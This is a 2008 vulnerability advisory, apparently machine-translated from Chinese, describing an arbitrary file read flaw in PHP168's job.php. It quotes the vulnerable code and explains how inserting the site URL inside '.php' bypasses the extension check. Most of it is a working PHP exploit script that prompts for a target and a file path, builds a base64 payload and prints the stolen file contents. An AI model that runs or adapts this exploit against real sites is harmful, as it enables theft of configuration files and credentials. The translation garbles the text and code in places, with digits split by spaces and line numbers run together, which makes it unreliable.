Php168 read arbitrary file vulnerability-vulnerability warning-the black bar safety net

2008-08-30T00:00:00
ID MYHACK58:62200820203
Type myhack58
Reporter 佚名
Modified 2008-08-30T00:00:00

Description

Reprint address: http://hi.baidu.com/saiy_hi/

Oh, forgot to say, the program official URL: http://www.php168.com/#

代码 :..job.php Line:1 1 7

if( eregi(". php",$url) ){ die("ERR"); } $fileurl=str_replace($webdb[www_url],"",$url); if(is_file(PHP168_PATH."$ fileurl")&&filesize(PHP168_PATH."$ fileurl")<1 0 2 41 0 2 45 0 0){ $filename=basename($fileurl); $filetype=substr(strrchr($filename,'.'), 1); $filename=preg_replace("/([\d]+)(2 0 0[\d]+)([^]+)\. ([^\.]+)/ is","\\3",$filename);

if(eregi("^([a-z0-9=]+)$",$_filename)&&! eregi("(jpg|gif|png)$",$filename)){ $filename=urldecode(base64_decode($_filename)).".$ filetype"; } ob_end_clean(); header('Last-Modified: '. gmdate('D, d M Y H:i:s',time()).' GMT'); header('Pragma: no-cache'); header('Content-Encoding: none'); header('Content-Disposition: attachment; filename='.$ filename); header('Content-type: '.$ filetype); header('Content-Length: '. filesize(PHP168_PATH."$ fileurl")); readfile(PHP168_PATH."$ fileurl"); }else{ $fileurl=strstr($url,"://")?$ url:tempdir($fileurl); header("location:$fileurl"); }

In this code, 有判断url里是否包含.php but in the next, there is a replacement $fileurl=str_replace($webdb[www_url],"",$url);

. p$webdb[www_url]hp 被 替换 后 就是 .php but can smoothly through the front of existence. php judgment.

I did not install this code, but search a bit The code,$webdb[www_url]should be a Web URL address.

The conclusion is: you can read any file.

I wrote a Exp to read the file, but since there is no installation of php168, so if someone is willing to test it had to

Due to the previous Write of EXP too not humane, now connect the input variables are changed to

php php168. php is running just fine

PHP code

  1. <? php
  2. make_input('url','please enter Php168 where the program address,for example http://www. xxx. com/');
    1. while (1){
  3. if(substr($url,0,7)!==' http://') make_input('url','Big Brother, how is this possible is the World Wide Web said Url's, professional.');
  4. else break;
  5. }
    1. if(substr($url,0,-1)!=='/') $url.='/'; 1 0. //If the URL of the last bit is not/,the complement of the 1 1. 1 2. if(!$ tmp=@file_get_contents($url.'job.php')) die('Oh, you're fucking with me, I don't run down.'); 1 3. //If read job. php is empty, don't run away, run hard. 1 4. 1 5. make_input('file_path','Sir, you want to read a what file?'); 1 6. 1 7. $query = str_replace('php','ph'.$ url.'p',$file_path); 1 8. 1 9. $hack_url = $url.'job. php? url='. base64_encode($query); 2 0. 2 1. $result = file_get_contents($hack_url); 2 2. 2 3. echo $result; 2 4. 2 5. die; 2 6. 2 7. function make_input($name,$msg="please enter the{name}Value",$type='text'){ 2 8. //Web:http://hi. baidu. com/saiy_wowman/ 2 9. global $$name; 3 0. if(isset($$name)) $$name = "; 3 1. while(1){ 3 2. if(! isset($$name)||$$name=="){ 3 3. $msg = str_replace('{name}',$name,$msg); 3 4. echo $msg."\ r\n"; 3 5. $_input = trim(fgets(STDIN)); 3 6. if($_input!==") { 3 7. if($type=='int'){ 3 8. if(is_numeric($_input)) { 3 9. $$name = $_input; 4 0. break; 4 1. } 4 2. }else{ 4 3. $$name = $_input; 4 4. break; 4 5. } 4 6. } 4 7. }else{ 4 8. break; 4 9. } 5 0. } 5 1. } 5 2. ?& gt;